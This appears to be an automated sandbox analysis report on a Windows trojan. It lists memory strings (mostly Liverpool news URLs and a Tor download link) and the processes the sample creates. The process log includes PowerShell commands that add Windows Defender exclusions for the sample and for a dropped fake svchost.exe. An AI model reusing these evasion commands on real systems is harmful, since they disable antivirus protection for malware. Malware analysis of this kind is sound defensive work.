            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
            Source: qINcOlwRud.exe, 00000000.00000002.271085318.0000000003020000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal
            Source: qINcOlwRud.exe, 00000000.00000002.271085318.0000000003020000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf4
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
            Source: svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
            Source: svchost.exe, 00000015.00000002.325607355.0000023ABEC13000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000015.00000003.314338575.0000023ABEC45000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000015.00000003.314338575.0000023ABEC45000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000015.00000002.326324618.0000023ABEC39000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
            Source: svchost.exe, 00000015.00000003.314649604.0000023ABEC54000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
            Source: qINcOlwRud.exe, 00000000.00000002.269584195.0000000001231000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/schedule/
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
            Source: qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmp | String found in binary or memory: https://www.liverpool.com/search/
            Source: qINcOlwRud.exe, 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
            Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
            Source: qINcOlwRud.exe, 00000000.00000002.269153211.00000000011BA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Code function: 0_2_01174448
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Code function: 0_2_01174B08
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Code function: 0_2_0117ED30
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Code function: 0_2_0117C10C
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Code function: 0_2_0117D6D8
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Code function: 0_2_0117D92C
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Code function: 13_2_015D2207
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Code function: 13_2_015D2A08
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Code function: 13_2_015D9EAC
            Source: Joe Sandbox View | Dropped File: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe 552A8D763C86BB50DED18CF8F790F18828C471EC5A4D3CAC71EAF7693314A04C
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 1936
            Source: qINcOlwRud.exe, 00000000.00000000.207154694.0000000000ABA000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDimbono.exe0 vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.388289726.0000000005F60000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.269988009.00000000013C0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.267682824.0000000000EF7000.00000004.00000010.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.269963750.00000000013B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dllj% vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.382192537.0000000005520000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.382192537.0000000005520000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameHjwp TPs.exe2 vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.269153211.00000000011BA000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 00000000.00000002.377981680.0000000005430000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs qINcOlwRud.exe
            Source: qINcOlwRud.exe, 0000000A.00000000.254365298.000000000075A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDimbono.exe0 vs qINcOlwRud.exe
            Source: qINcOlwRud.exe | Binary or memory string: OriginalFilenameDimbono.exe0 vs qINcOlwRud.exe
            Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@53/25@4/2
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | File created: C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | File created: C:\Users\user\QTSKUnyljdzYWpkbMIVLIBDYJvtcjEA
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6652:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:160:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_01
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5476
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3ochp5k.jrz.ps1
            Source: qINcOlwRud.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: qINcOlwRud.exe | Virustotal: Detection: 21%
            Source: qINcOlwRud.exe | ReversingLabs: Detection: 27%
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | File read: C:\Users\user\Desktop\qINcOlwRud.exe:Zone.Identifier
            Source: unknown | Process created: C:\Users\user\Desktop\qINcOlwRud.exe 'C:\Users\user\Desktop\qINcOlwRud.exe'
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
            Source: C:\Users\user\Desktop\qINcOlwRud.exe | Process created: C:\Users\user\Desktop\qINcOlwRud.exe C:\Users\user\Desktop\qINcOlwRud.exe
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: unknown | Process created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe'
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
            Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
            Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
            Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Process created: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe | Process created: unknown unknown
